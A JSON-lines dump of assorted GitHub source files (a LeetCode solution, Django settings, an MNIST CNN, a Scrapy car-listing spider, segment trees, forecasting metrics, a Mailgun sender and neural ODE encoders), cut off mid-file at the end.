+{"seq_id":"10939033437","text":"class Solution:\n def findJudge(self, n: int, trust: List[List[int]]) -> int:\n #n+1 dikarenakan n dimulai dari 1 bukan dari 0\n #tc adalah trust count yaitu tempat perhitungan trust\n tc = [0] * (n+1)\n #jika n adalah 2 maka tc adalah [0, 0, 0]\n #jika trust adalah [[1,2]]\n for x in trust:\n tc[x[0]] -=1\n #maka tc pada index 1 akan di berikan -1 sehingga tc menjadi [0, -1, 0]. index 1 didapat dari x[0]\n tc[x[1]] +=1\n #disini tc dengan index 2 akan di tambahkan menjadi 1 sehingga tc [0, -1, 1]. index 2 didapat dari x[1]\n #range dimulai dari 1 dikarenakan tc dimulai dari index 1\n for i in range (1,n+1):\n #n-1 dikarenakan jika ada judge, judge pasti adalah orang yang tidak percaya orang lain sehingga seharusnya judge adalah orang yang tidak punya koneksi\n if tc[i] == n-1:\n return i\n #jika dari semua n mempunyai koneksi maka -1 \n return -1\n","repo_name":"galuhardiansyah/test","sub_path":"judge.py","file_name":"judge.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"44663251216","text":"from django.urls import path\n#from .views import UserAPIView\nfrom . import views\n\nurlpatterns = [\n path('',views.login, name=\"display\"),\n path('signin/',views.signin,name=\"signin\"),\n path('fetch/',views.getUser, name=\"getu\"),\n path('submit/',views.submitUser, name=\"submitb\"),\n]\n","repo_name":"Archit9394/React_app1","sub_path":"display/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16600235102","text":"\"\"\"mnist data를 이용해 model 구현해보기 (시간이 너무 오래걸려서 output 확인은 안 해봄)\"\"\"\r\n\r\nimport tensorflow as tf\r\nfrom tensorflow.keras import datasets, layers, models\r\n\r\n(train_images, train_labels), (test_images, test_labels) = datasets.mnist.load_data()\r\ntrain_images = train_images.reshape((60000, 28, 28, 1))\r\ntest_images = test_images.reshape((10000, 28, 28, 1))\r\n# 픽셀 값을 0~1 사이로 정규화합니다.\r\ntrain_images, test_images = train_images / 255.0, test_images / 255.0\r\n\r\nmodel = models.Sequential()\r\nmodel.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=(28, 28, 1),padding='same',strides=1))\r\nmodel.add(layers.MaxPooling2D((2, 2)))\r\nmodel.add(layers.Conv2D(64, (3, 3), activation='relu',padding='same',strides=1))\r\nmodel.add(layers.MaxPooling2D((2, 2)))\r\nmodel.add(layers.Flatten())\r\nmodel.add(layers.Dense(10, activation='softmax'))\r\nmodel.summary()\r\nmodel.compile(optimizer='adam',loss='sparse_categorical_crossentropy',metrics=['accuracy'])\r\nmodel.fit(train_images, train_labels, epochs=5)\r\n#모델 빌드\r\ntest_loss, test_acc = model.evaluate(test_images, test_labels, verbose=2)\r\nprint(test_acc)\r\n","repo_name":"dlwlsdn201/2020CapstonDesign_OOTD-Project","sub_path":"JH_CNN_MNIST.py","file_name":"JH_CNN_MNIST.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14634227083","text":"# coding=utf-8\nimport os\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\nREDIS_CONF = {\n \"host\": \"127.0.0.1\",\n \"port\": \"6380\"\n}\n\n\nDEBUG = True\n\nALLOWED_HOSTS = [\"*\"]\n\nDATA_DIR = f\"{BASE_DIR}/data\"\n","repo_name":"SardarDawar/judge","sub_path":"oj/dev_settings.py","file_name":"dev_settings.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72608391734","text":"#!/usr/bin/env python3\n\nfrom inspect import currentframe\nimport re\n\n\n\nclass Scraping_utilities:\n\n @staticmethod\n def __parse_name(string):\n try:\n return string.split(\"(\")[0].strip()\n except Exception as ex:\n print(\"Error on line no: {}\".format( ex))\n\n @staticmethod\n def __extract_digits(string):\n try:\n return int(re.search(r'\\d+', string).group(0))\n except Exception as ex:\n print(\"Error on line no.: {}\".format( ex))\n","repo_name":"HamedMinaeizaeim/twitter_scraper_without_API","sub_path":"src/twitter_scraper_without_api/scraping_utilities.py","file_name":"scraping_utilities.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"35056529622","text":"from scrapy import Request\nfrom scrapy import Spider\nfrom re import findall\n\n\nclass KavakspiderSpider(Spider):\n name = 'KavakSpider'\n allowed_domains = ['www.kavak.com']\n\n def start_requests(self):\n urls = [\n 'https://www.kavak.com/br/carros-usados']\n\n for x in range(2, 157):\n l = f'https://www.kavak.com/br/page-{x}/carros-usados'\n urls.append(l)\n\n for url in urls:\n yield Request(\n url,\n callback=self.parse\n )\n\n def parse(self, response, **kwargs):\n\n model = response.css(\n 'div[class=\"card-body\"] h2::text').getall()\n details = response.css(\n 'div[class=\"card-body\"] p::text').getall()\n years = [''.join(findall(r'(\\w+)', x)[0])\n for x in details if findall('•', x)]\n distance = [''.join(findall(r'(\\w+)', x)[1:3])\n for x in details if findall('•', x)]\n state = [' '.join(findall(r'(\\w+)', x)[4:])\n for x in details if findall('•', x)]\n prize = response.css(\n 'div[class=\"payment-tax-wrapper\"] span::text').getall()\n\n for modelo, ano, preco, kil, estado in zip(model, years, prize, distance, state):\n yield {\n \"Modelo\": modelo,\n \"Ano\": ano,\n \"Preço\": preco,\n \"KM\": kil,\n \"Estado\": estado\n }\n","repo_name":"gustavocoiimbra/scrapy-site-kavak","sub_path":"Kavak/spiders/KavakSpider.py","file_name":"KavakSpider.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16935522084","text":"import string\nfrom stemming.porter2 import stem\nfrom nltk.corpus import stopwords\nimport DependencyParser\n\n\ndef tokenize(get_queries):\n def wrapper(*args, **kwargs):\n queries = get_queries(*args, **kwargs)\n cleaned = cleanUp(queries)\n avoid = list()\n for k, v in cleaned.iteritems():\n # cleaned[k] = v.split(\" \")\n cleaned[k] = preprocess_query(v.split(\" \"), avoid)\n return cleaned\n return wrapper\n\n\ndef cleanUp(queries):\n for k, v in queries.iteritems():\n punctuations = set(string.punctuation)\n v_without_puncts = \"\"\n for ch in v:\n if ch in punctuations:\n v_without_puncts += ' '\n else:\n v_without_puncts += ch\n queries[k] = v_without_puncts.strip()\n return queries\n\n\ndef preprocess_query(tokens, avoid):\n stop_words = stopwords.words('english')\n stemmed = list()\n for token in tokens:\n if token not in stop_words + avoid:\n # stemmed.append(token.lower())\n stemmed.append(stem(token.lower()))\n return set(stemmed)\n\n\ndef dependency_parse(get_queries):\n def wrapper(*args, **kwargs):\n queries = get_queries(*args, **kwargs)\n cleaned = cleanUp(queries)\n\n for k, v in cleaned.iteritems():\n avoid = DependencyParser.parse(v)\n avoid.append('Document')\n cleaned[k] = preprocess_query(v.split(\" \"), avoid)\n\n return cleaned\n return wrapper\n","repo_name":"manthan787/IR","sub_path":"HW1/Query/Decorators.py","file_name":"Decorators.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28497967990","text":"import torch\nimport numpy as np\nfrom scipy.stats import pearsonr\n\n\ndef compute_scores(posterior_dist, test_data):\n \"\"\"Computes prediction scores\n Args:\n posterior_dist (torch.distributions.Distribution): (time,)\n test_data (ScenarioDataset)\n Returns:\n type: Description of returned object.\n \"\"\"\n # Extract posterior mean prediction\n posterior_mean = posterior_dist.mean.cpu()\n\n # Compute metrics over all predictions\n scores_deterministic = compute_deterministic_metrics(posterior_mean, test_data.tas)\n scores_probabilistic = compute_probabilistic_metrics(posterior_dist, test_data.tas)\n\n # Encapsulate scores into output dictionnary\n output = {**scores_deterministic, **scores_probabilistic}\n return output\n\n\ndef compute_deterministic_metrics(prediction, groundtruth):\n \"\"\"Compute deterministic metrics between posterior mean and groundtruth\n\n Args:\n prediction (torch.Tensor): (time,)\n groundtruth (torch.Tensor): (time,)\n\n Returns:\n type: dict[float]\n \"\"\"\n # Compute raw distances metrics\n difference = prediction.sub(groundtruth)\n mean_bias = difference.mean()\n rmse = torch.square(difference).mean().sqrt()\n mae = torch.abs(difference).mean()\n\n # Compute spearman correlation\n corr = spearman_correlation(prediction.flatten(), groundtruth.flatten())\n\n # Encapsulate results in output dictionnary\n output = {'mb': mean_bias.item(),\n 'rmse': rmse.item(),\n 'mae': mae.item(),\n 'corr': corr}\n return output\n\n\ndef compute_probabilistic_metrics(predicted_dist, groundtruth):\n \"\"\"Computes probabilistic metrics between posterior distribution and groundtruth\n\n Args:\n posterior_dist (torch.distributions.Distribution): (time,)\n groundtruth (torch.Tensor): (time,)\n\n Returns:\n type: dict[float]\n \"\"\"\n # Create normal distribution vector\n pointwise_predicted_dict = torch.distributions.Normal(loc=predicted_dist.mean, scale=predicted_dist.stddev)\n\n # Compute average LL of groundtruth\n ll = pointwise_predicted_dict.log_prob(groundtruth).mean()\n\n # Compute 95% calibration score\n lb, ub = pointwise_predicted_dict.icdf(torch.tensor(0.025)), pointwise_predicted_dict.icdf(torch.tensor(0.975))\n mask = (groundtruth >= lb) & (groundtruth <= ub)\n calib95 = mask.float().mean()\n\n # Compute integral calibration index\n confidence_region_sizes = np.arange(0.05, 1.0, 0.05)\n calibs = []\n for size in confidence_region_sizes:\n q_lb = (1 - float(size)) / 2\n q_ub = 1 - q_lb\n lb, ub = pointwise_predicted_dict.icdf(torch.tensor(q_lb)), pointwise_predicted_dict.icdf(torch.tensor(q_ub))\n mask = (groundtruth >= lb) & (groundtruth <= ub)\n calibs.append(mask.float().mean().item())\n ICI = np.abs(np.asarray(calibs) - confidence_region_sizes).mean()\n\n # Compute CRPS\n mu, sigma = predicted_dist.mean, predicted_dist.stddev\n y = (groundtruth - mu) / sigma\n norm = torch.distributions.Normal(0, 1)\n crps = torch.mean(sigma * (y * (2 * norm.cdf(y) - 1) + 2 * norm.log_prob(y).exp() - 1 / np.sqrt(np.pi)))\n\n # Encapsulate results in output dictionnary\n output = {'ll': ll.item(),\n 'calib95': calib95.item(),\n 'CRPS': crps.item(),\n 'ICI': ICI.item()}\n return output\n\n\ndef spearman_correlation(x, y):\n \"\"\"Computes Spearman Correlation between x and y\n Args:\n x (torch.Tensor)\n y (torch.Tensor)\n Returns:\n type: torch.Tensor\n \"\"\"\n x_std = (x - x.mean()) / x.std()\n y_std = (y - y.mean()) / y.std()\n corr = float(pearsonr(x_std.numpy(), y_std.numpy())[0])\n return corr\n","repo_name":"shahineb/FaIRGP","sub_path":"src/evaluation/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":3715,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"12069554175","text":"import pygame\r\nimport math\r\nfrom pygame.locals import *\r\nWIDTH = 1280\r\nHEIGHT = 720\r\nCELL_SIZE = 30\r\n\r\nWHITE = (255, 255, 255)\r\nBLACK = (0, 0, 0)\r\nGREEN = (0, 255, 0)\r\nRED = (255, 0, 0)\r\nBLUE = (0, 0, 255)\r\nORANGE = (255, 165, 0)\r\nGRAY = (129, 133, 137)\r\n\r\ndef read_map(filepath):\r\n with open(filepath, 'r') as file:\r\n n, m = map(int, file.readline().strip().split(\" \"))\r\n pac_map = []\r\n for _ in range(n):\r\n row = [int(x) for x in file.readline().strip().split(\" \")]\r\n pac_map.append(row)\r\n pac_pos = tuple(map(int, file.readline().strip().split(\" \")))\r\n food = [(i, j) for i in range(len(pac_map)) for j in range(len(pac_map[0])) if pac_map[i][j] == 2]\r\n monster = [(i, j) for i in range(len(pac_map)) for j in range(len(pac_map[0])) if pac_map[i][j] == 3]\r\n wall = [(i, j) for i in range(len(pac_map)) for j in range(len(pac_map[0])) if pac_map[i][j] == 1]\r\n return [pac_map, pac_pos, food, monster, wall]\r\n\r\nmap_dict = {'Level1':[read_map('Levels/level1/map1.txt'),read_map('Levels/level1/map2.txt'),read_map('Levels/level1/map3.txt')],\r\n 'Level2':[read_map('Levels/level2/map1.txt'), read_map('Levels/level2/map2.txt'),read_map('Levels/level1/map3.txt')],\r\n 'Level3':[read_map('Levels/level3/map1.txt'), read_map('Levels/level3/map2.txt'),read_map('Levels/level3/map3.txt')],\r\n 'Level4':[read_map('Levels/level4/map1.txt'),read_map('Levels/level4/map2.txt'),read_map('Levels/level4/map3.txt')]}\r\n\r\n\r\nchange_map_list = [read_map('Levels/level1/map1.txt')[0],read_map('Levels/level1/map2.txt')[0],read_map('Levels/level1/map3.txt')[0]]\r\nvictory_bg = pygame.transform.scale(pygame.image.load(\"images/victory.png\"),(WIDTH,HEIGHT))\r\ndef get_map_pos_y(map,CELL_SIZE):\r\n return WIDTH // 2 - (CELL_SIZE * len(map[0]) // 2)\r\ndef get_map_pos_x(map,CELL_SIZE):\r\n return HEIGHT // 2 - (CELL_SIZE * len(map) // 2)\r\n\r\ndef get_font(size): # Returns Press-Start-2P in the desired size\r\n return pygame.font.Font(\"font/font.ttf\", size)\r\n\r\ndef victory_state(screen):\r\n screen.blit(victory_bg, (0, 0))","repo_name":"nghia3anp3/csAI-21TNT1-pacman","sub_path":"NH/Variables.py","file_name":"Variables.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"31038312624","text":"#!/Users/amod/venv/bin/python\n# name : Amod\n# date : 1 april 2020\nimport argparse\n\n\n# Function definition\ndef print_me():\n print(\"Test print\")\n\n\ndef add(a, b):\n print(a+b)\n\n\ndef sub(x, y):\n '''doc string\n this method is subtraction\n it takes argument x, y\n '''\n c = x - y\n print(c)\n\n\ndef multiply(a, b):\n print(int(a)*int(b))\n\n\ndef divide(a, b):\n print(int(a)/int(b))\n\n\n\n\n# main Program\n#a = input(\"Enter an integer value : \")\n#b = input(\"Enter an integer value : \")\n#op = input(\"Enter either * or / or + or -\")\n\nparser = argparse.ArgumentParser(description=\"Math Calculation\")\nparser.add_argument('a', type=int, help=\"Enter only integers\")\nparser.add_argument('b', type=int, help=\"Enter only integers\")\nparser.add_argument('op', type=str, help=\"Enter only symbols * or / or + or --\")\nargs = parser.parse_args()\n# print(args)\na = args.a\nb = args.b\nop = args.op\n\n\nif op == \"*\":\n multiply(a, b)\nelif op == \"/\":\n divide(a, b)\nelif op == \"+\":\n add(a, b)\nelif op == \"-\":\n sub(int(a), b)\nelse:\n print(\"Incorrect input\")\n","repo_name":"AmodGawade/Python_programs","sub_path":"Programs/Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19348403744","text":"#https://www.it-swarm.dev/es/python/como-ejecutar-una-funcion-de-forma-asincrona-cada-60-segundos-en-python/968384697/\n\n#https://www.generacodice.it/es/articolo/348349/How-to-execute-a-function-asynchronously-every-60-seconds-in-Python\n\nimport threading\nimport time\nglobal j\nj=0\n\ndef miaa():\n h=23\n print(h)\n\ndef f():\n global j\n j += 1\n print(\"hello world {}\".format(j))\n threading.Timer(3, f).start()\n\n #while(True):\n\n # time.sleep(3)\n # hola=input('Ingrese los datos:')\n\nif __name__ == '__main__':\n f() \n miaa() \n time.sleep(20)\n","repo_name":"epm1989/C7test","sub_path":"snippet_personales/pryevaasync.py","file_name":"pryevaasync.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74651268211","text":"import math\r\n\r\nclass SegmentTreeNode:\r\n def __init__(self, v=0):\r\n self.sum = v\r\n def merge(self, left, right):\r\n if left is not None and right is not None:\r\n self.sum = left.sum + right.sum\r\n elif left is None and right is None:\r\n self.sum = 0\r\n elif left is None:\r\n self.sum = right.sum\r\n else:\r\n self.sum = left.sum\r\n\r\nclass SegmentTree:\r\n def __init__(self, a):\r\n n = len(a)\r\n power = math.ceil(math.log(n, 2))\r\n total = 2 ** (power + 1)\r\n self.__tree = [None] * int(total)\r\n self.__leaf_length = int(total/2)-1\r\n self.__build(1, 0, self.__leaf_length, a)\r\n\r\n def __build(self, node, l, r, a):\r\n if l == r:\r\n self.__tree[node] = SegmentTreeNode()\r\n try:\r\n self.__tree[node].sum = a[l]\r\n except IndexError:\r\n self.__tree[node].sum = 0\r\n return\r\n leftchild = 2 * node\r\n rightchild = leftchild + 1\r\n mid = (l + r) // 2\r\n self.__build(leftchild, l, mid, a)\r\n self.__build(rightchild, mid + 1, r, a)\r\n self.__tree[node] = SegmentTreeNode()\r\n l = self.__tree[leftchild]\r\n r = self.__tree[rightchild]\r\n self.__tree[node].merge(l, r)\r\n\r\n def __query(self, node, l, r, i, j):\r\n if l >= i and r <= j:\r\n return self.__tree[node]\r\n elif j < l or i > r:\r\n return None\r\n else:\r\n leftchild = 2 * node\r\n rightchild = leftchild + 1\r\n mid = (l + r) // 2\r\n l = self.__query(leftchild, l, mid, i, j)\r\n r = self.__query(rightchild, mid + 1, r, i, j)\r\n if l is not None and r is not None:\r\n return SegmentTreeNode(l.sum+r.sum)\r\n elif l is None and r is None:\r\n return SegmentTreeNode(0)\r\n elif l is None:\r\n return SegmentTreeNode(r.sum)\r\n else:\r\n return SegmentTreeNode(l.sum)\r\n\r\n def query(self, i, j): \r\n return self.__query(1, 0, self.__leaf_length, i, j)\r\n\r\nclass MaxSegmentTreeNode:\r\n def __init__(self, v=[]):\r\n self.max = v\r\n def merge(self, left, right, k):\r\n if left is not None and right is not None:\r\n self.max = sorted(left.max + right.max)[-k:]\r\n elif left is None and right is None:\r\n self.max = []\r\n elif left is None:\r\n self.max = right.max\r\n else:\r\n self.max = left.max\r\n\r\nclass MaxSegmentTree:\r\n def __init__(self, a, k):\r\n n = len(a)\r\n power = math.ceil(math.log(n, 2))\r\n total = 2 ** (power + 1)\r\n self.__tree = [None] * int(total)\r\n self.__leaf_length = int(total/2)-1\r\n self.__build(1, 0, self.__leaf_length, a, k)\r\n\r\n def __build(self, node, l, r, a, k):\r\n if l == r:\r\n self.__tree[node] = MaxSegmentTreeNode()\r\n try:\r\n self.__tree[node].max = [a[l]]\r\n except IndexError:\r\n self.__tree[node].max = []\r\n return\r\n leftchild = 2 * node\r\n rightchild = leftchild + 1\r\n mid = (l + r) // 2\r\n self.__build(leftchild, l, mid, a, k)\r\n self.__build(rightchild, mid + 1, r, a, k)\r\n self.__tree[node] = MaxSegmentTreeNode()\r\n l = self.__tree[leftchild]\r\n r = self.__tree[rightchild]\r\n self.__tree[node].merge(l, r, k)\r\n\r\n def __query(self, node, l, r, i, j, k):\r\n if l >= i and r <= j:\r\n return self.__tree[node]\r\n elif j < l or i > r:\r\n return None\r\n else:\r\n leftchild = 2 * node\r\n rightchild = leftchild + 1\r\n mid = (l + r) // 2\r\n l = self.__query(leftchild, l, mid, i, j, k)\r\n r = self.__query(rightchild, mid + 1, r, i, j, k)\r\n if l is not None and r is not None:\r\n return MaxSegmentTreeNode(sorted(l.max+r.max)[-k:])\r\n elif l is None and r is None:\r\n return MaxSegmentTreeNode([])\r\n elif l is None:\r\n return MaxSegmentTreeNode(r.max)\r\n else:\r\n return MaxSegmentTreeNode(l.max)\r\n\r\n def query(self, i, j, k): \r\n return self.__query(1, 0, self.__leaf_length, i, j, k)\r\n \r\ndef get_start_index(time_stamp_list, l, r, time_stamp):\r\n \r\n if l==r or time_stamptime_stamp_list[r]:\r\n return -1\r\n mid = (l+r)//2\r\n if time_stamp == time_stamp_list[mid]:\r\n if mid >= 1 and time_stamp_list[mid-1]==time_stamp:\r\n return get_start_index(time_stamp_list, l, mid-1, time_stamp)\r\n else:\r\n return mid\r\n elif time_stamp < time_stamp_list[mid]:\r\n if (mid >=1 and time_stamp>time_stamp_list[mid-1]):\r\n return mid\r\n else:\r\n return get_start_index(time_stamp_list, l, mid-1, time_stamp)\r\n else:\r\n return get_start_index(time_stamp_list, mid+1, r, time_stamp)\r\n\r\ndef get_stop_index(time_stamp_list, l , r, time_stamp):\r\n if l==r or time_stamp>time_stamp_list[r]:\r\n return r\r\n if time_stamp < time_stamp_list[l]:\r\n return -1\r\n mid = (l+r)//2\r\n if time_stamp == time_stamp_list[mid]:\r\n if mid < r and time_stamp_list[mid+1]==time_stamp:\r\n return get_stop_index(time_stamp_list, mid+1, r, time_stamp)\r\n else:\r\n return mid\r\n elif time_stamp > time_stamp_list[mid]:\r\n if mid < r and time_stamp < time_stamp_list[mid+1]:\r\n return mid\r\n else:\r\n return get_stop_index(time_stamp_list, mid+1, r, time_stamp)\r\n else:\r\n return get_stop_index(time_stamp_list, l, mid-1, time_stamp)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nline1 = input().strip(' ').split(' ')\r\nnum_of_input = int(line1[1])\r\n\r\nSiFj = {}\r\nSiFj_timestamp = {}\r\nSiFj_linenum = {}\r\nSiFj_sum = {}\r\nSiFj_sum_segtree = {}\r\nSiFjk_max_segtree = {}\r\n\r\nSiFjFk = {}\r\nSiFjFk_timestamp = {}\r\nSiFjFk_sum = {}\r\nSiFjFk_sum_segtree = {}\r\n\r\n\r\nfor line_iterator in range(num_of_input):\r\n input_line = input().strip(' ').split(' ')\r\n num_of_items = len(input_line)\r\n time_stamp = int(input_line[0])\r\n symbol = input_line[1]\r\n iter = 2\r\n while iter\" % (from_name, from_field),\n \"to\": \"%s <%s>\" % (to_name, to_field),\n \"subject\": subject_field,\n \"text\": strip_tags(body_text)})\n\n def evaluate_timeout(self, response):\n if response.status_code != requests.codes.ok:\n self.timeout = True\n else:\n self.timeout = False\n","repo_name":"mylons/email_service","sub_path":"email_strategy/mailgun.py","file_name":"mailgun.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"11561566514","text":"import torch\nimport torch.nn as nn\nimport numpy as np\n\nfrom torchdiffeq import odeint_adjoint as odeint\n\n\nclass Swish(nn.Module):\n \"\"\"Swish activation function.\n\n Implements swish activation function: https://arxiv.org/pdf/1710.05941.pdf.\n Claimed by NODE authors to perform well in NODEs.\n \"\"\"\n\n def __init__(self):\n \"\"\"Initialize swish activation function.\"\"\"\n super(Swish, self).__init__()\n\n def forward(self, x, beta=1):\n \"\"\"Compute swish forward pass.\n\n Args:\n x (torch.Tensor): Input data.\n beta (float, optional): Scaling factor. Defaults to 1.\n\n Returns:\n torch.Tensor: Data with swish non-linearity applied.\n \"\"\"\n return x * torch.sigmoid(beta * x)\n\n\nACTIVATION_DICT = {\n 'Swish': Swish,\n 'Tanh': nn.Tanh,\n 'ReLU': nn.ReLU,\n 'Softplus': nn.Softplus\n}\n\n\nclass FCNN(nn.Module):\n \"\"\"Generic fully connected MLP.\n\n Attributes:\n act (nn.Module): Activation function to use between layers.\n fc_in (nn.Module): Linear layer mapping input to hidden state.\n fc_out (nn.Module): Linear layer mapping hidden state to output.\n fc_hidden (nn.ModuleList): Hidden layers.\n \"\"\"\n\n def __init__(self, input_dim, n_hidden, n_layer, act_type, output_dim=None):\n \"\"\"Initialize NN representing ODE function.\n\n Args:\n input_dim (int): Dimension of input data.\n n_hidden (int): Number of hidden units in NN.\n n_layer (int): Number of layers in NN.\n act_type (string): Type of activation to use between layers.\n output_dim (int): Dimension of NN output; defaults to input_dim\n\n Raises:\n ValueError: Thrown when activation function is unknown.\n \"\"\"\n super().__init__()\n\n output_dim = input_dim if output_dim is None else output_dim\n\n self.fc_in = nn.Linear(input_dim, n_hidden)\n self.fc_out = nn.Linear(n_hidden, output_dim)\n\n layers = [nn.Linear(n_hidden, n_hidden) for _ in range(n_layer-1)]\n self.fc_hidden = nn.ModuleList(layers)\n\n try:\n self.act = ACTIVATION_DICT[act_type]()\n except KeyError:\n raise ValueError(\"Unsupported activation function.\")\n\n def forward(self, x):\n \"\"\"Compute forward pass.\n\n Args:\n x (torch.Tensor): Data observations.\n\n Returns:\n torch.Tensor: Output of forward pass.\n \"\"\"\n h = self.fc_in(x)\n h = self.act(h)\n\n for layer in self.fc_hidden:\n h = layer(h)\n h = self.act(h)\n\n out = self.fc_out(h)\n return out\n\n\nclass GRU(nn.Module):\n \"\"\"Gated Recurrent Unit.\n\n Implementation is borrowed from https://github.com/YuliaRubanova/latent_ode\n which in turn uses http://www.wildml.com/2015/10/recurrent-neural-network-\n tutorial-part-4-implementing-a-grulstm-rnn-with-python-and-theano/\n \"\"\"\n\n def __init__(self, input_dim, latent_dim, n_units=100):\n \"\"\"Initialize GRU.\n\n Args:\n input_dim (int): Dimension of input.\n latent_dim (int): Dimension of latent state.\n n_units (int, optional): Number of GRU units.\n \"\"\"\n super(GRU, self).__init__()\n\n self.update_gate = nn.Sequential(\n nn.Linear(latent_dim + input_dim, n_units),\n nn.Tanh(),\n nn.Linear(n_units, latent_dim),\n nn.Sigmoid())\n self.init_network(self.update_gate)\n\n self.reset_gate = nn.Sequential(\n nn.Linear(latent_dim + input_dim, n_units),\n nn.Tanh(),\n nn.Linear(n_units, latent_dim),\n nn.Sigmoid())\n self.init_network(self.reset_gate)\n\n self.new_state_net = nn.Sequential(\n nn.Linear(latent_dim + input_dim, n_units),\n nn.Tanh(),\n nn.Linear(n_units, latent_dim))\n self.init_network(self.new_state_net)\n\n def forward(self, x, h):\n \"\"\"Compute GRU forward pass.\n\n Args:\n x (torch.Tensor): Input date for specific time point.\n h (torch.Tensor): Previous hidden state.\n Returns:\n torch.Tensor: Updated hidden state.\n \"\"\"\n input_concat = torch.cat([h, x], -1)\n\n update_gate = self.update_gate(input_concat)\n reset_gate = self.reset_gate(input_concat)\n\n concat = torch.cat([h * reset_gate, x], -1)\n\n new_state = self.new_state_net(concat)\n\n new_y = (1 - update_gate) * new_state + update_gate * h\n\n return new_y\n\n @staticmethod\n def init_network(net):\n \"\"\"Initialize network using normal distribution.\n\n Args:\n net (nn.Module): NN to initialize.\n \"\"\"\n for module in net.modules():\n if isinstance(module, nn.Linear):\n nn.init.normal_(module.weight, mean=0, std=0.1)\n nn.init.constant_(module.bias, val=0)\n\n\nclass EncoderAR(nn.Module):\n def __init__(self):\n super().__init__()\n\n def forward(self, x, tp, lens, args):\n args = args['aug_args']\n samp_ind = self.generate_samp_mask(x, args['s_min'], args['s_frac'])\n\n hid_arr = self._forward_impl(x, tp, lens, samp_ind, args['samp_prob'])\n out = self.select_by_length(hid_arr, np.array(lens))\n return out\n\n def predict(self, x, tp, lens, args):\n args = args['aug_args']\n samp_ind = self.generate_samp_mask(x, args['s_min'], args['s_frac'])\n\n hid_arr = self._forward_impl(x, tp, lens, samp_ind, 0)\n out = self.select_by_length(hid_arr, np.array(lens))\n return out\n\n def _forward_impl(self, x, tp, lens, samp_ind, samp_prob):\n raise NotImplementedError\n\n @staticmethod\n def generate_samp_mask(x, extrap_min, samp_frac):\n # Generate mask for training.\n # Points after extrapolation region index are all sampled.\n minimum_ind = int(x.size(1) * extrap_min)\n extrap_ind = np.random.randint(minimum_ind, x.size(1))\n\n valid_inds = np.arange(extrap_ind)\n n_inds = int(samp_frac * extrap_ind)\n\n samp_inds = np.sort(np.random.choice(valid_inds, n_inds, replace=False))\n\n return samp_inds\n\n @staticmethod\n def select_by_length(hid_array, lengths):\n # Used to select output from GRU output array.\n mask = torch.zeros(hid_array.size()).bool().to(hid_array.device)\n for i in range(len(mask)):\n mask[i, :lengths[i], :] = 1\n return hid_array.masked_select(mask).view(-1, hid_array.size(2))\n\n @staticmethod\n def get_longest_tp(tps, lens):\n ind = np.argmax(np.array(lens))\n return tps[ind]\n\n\nclass EncoderGRU(EncoderAR):\n def __init__(self, hidden_dim, rec_gru, rec_output, delta_t=True):\n super().__init__()\n\n self.gru = rec_gru\n self.out = rec_output\n self.hidden_dim = hidden_dim\n self.delta_t = delta_t\n\n def _forward_impl(self, x, tp, lens, samp_ind, samp_prob):\n seq_len = max(lens)\n\n if self.delta_t:\n delta = self.generate_delta(tp)\n x = torch.cat([x, delta], dim=2)\n\n h = torch.zeros(x.shape[0], self.hidden_dim).to(x.device)\n h_arr = torch.zeros(x.shape[0], seq_len, h.size(1)).to(x.device)\n\n for i in range(seq_len):\n if i not in samp_ind and np.random.uniform(0, 1) >= samp_prob:\n prev_out = self.out(h.unsqueeze(1)).view(x.shape[0], -1)\n\n if self.delta_t:\n # Append time delta\n prev_out = torch.cat([prev_out, x[:, i, -1:]], dim=-1)\n h = self.gru(prev_out, h)\n else:\n h = self.gru(x[:, i, :], h)\n\n h_arr[:, i, :] = h\n\n return self.out(h_arr)\n\n @staticmethod\n def generate_delta(tp):\n tp_start = torch.Tensor([0] * tp.size(0)).unsqueeze(1).float()\n tp_start = tp_start.to(tp.device)\n offset = torch.cat((tp_start, tp), dim=1)[:, :-1]\n delta = tp - offset\n return delta.unsqueeze(-1)\n\n\nclass EncoderGRUODE(EncoderAR):\n def __init__(self, latent_dim, rec_gru, rec_node, rec_output):\n super().__init__()\n\n self.gru = rec_gru\n self.node = rec_node\n self.out = rec_output\n self.latent_dim = latent_dim\n\n def _forward_impl(self, x, tp, lens, samp_ind, samp_prob):\n seq_len = max(lens)\n\n h = torch.zeros(x.size(0), self.latent_dim).to(x.device)\n h_arr = torch.zeros(x.size(0), seq_len, h.size(1)).to(x.device)\n\n tp = 